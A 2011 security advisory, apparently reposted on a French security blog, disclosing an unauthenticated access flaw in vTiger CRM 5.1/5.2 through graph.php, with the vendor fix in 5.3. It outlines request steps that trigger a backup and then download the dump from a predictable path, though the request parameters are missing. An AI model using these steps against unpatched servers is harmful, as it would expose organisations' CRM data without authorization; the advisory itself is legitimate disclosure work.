Advisory: MEDS-2011-01 – VTigerCRM Anonymous access to Setting Module

Publié le par | sécurité


Here a old vulnerability submitted to vTiger Team last summer. As the 5.3 release was released some week ago, I can now publish this advisory.

Advisory: MEDS-2011-01 - VTigerCRM Anonymous access to Setting Module
using graph.php
Release Date: 2011-05-08
Author: Francois Harvey, gestion medsecure (francois.harvey at
medsecure dot ca) -
Application: Vtiger CRM 5.2.x, 5.1.x
Severity: High
Risk: High
Vendor Status: notified fixed in 5.3


"vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support."


Some module (Many in Setting, but also Portal) from vtiger CRM don't
verify the user access level and may be called in anonymous mode using
the graph.php script. This vulnerability can be used to view or modify
some configurations setting (organisation name, templates, backup).


# Show Organization information


# Launching Backup and get the backup file (if enabled)

1) Start a Backup
POST /vtigercrm/graph.php

2) Find the backup name in the output
Backed Up Successfully To File : ./backups/Vtiger-dd May 2011 hh_mm_ss

3) Get the Dumpfile
GET /vtigercrm/backups/Vtiger-dd May 2011 hh_mm_ss


Upgrade to 5.3.x

François Harvey - CISM/CISSP/TCSE
Professionnel en sécurité de l'information
Gestion medsecure -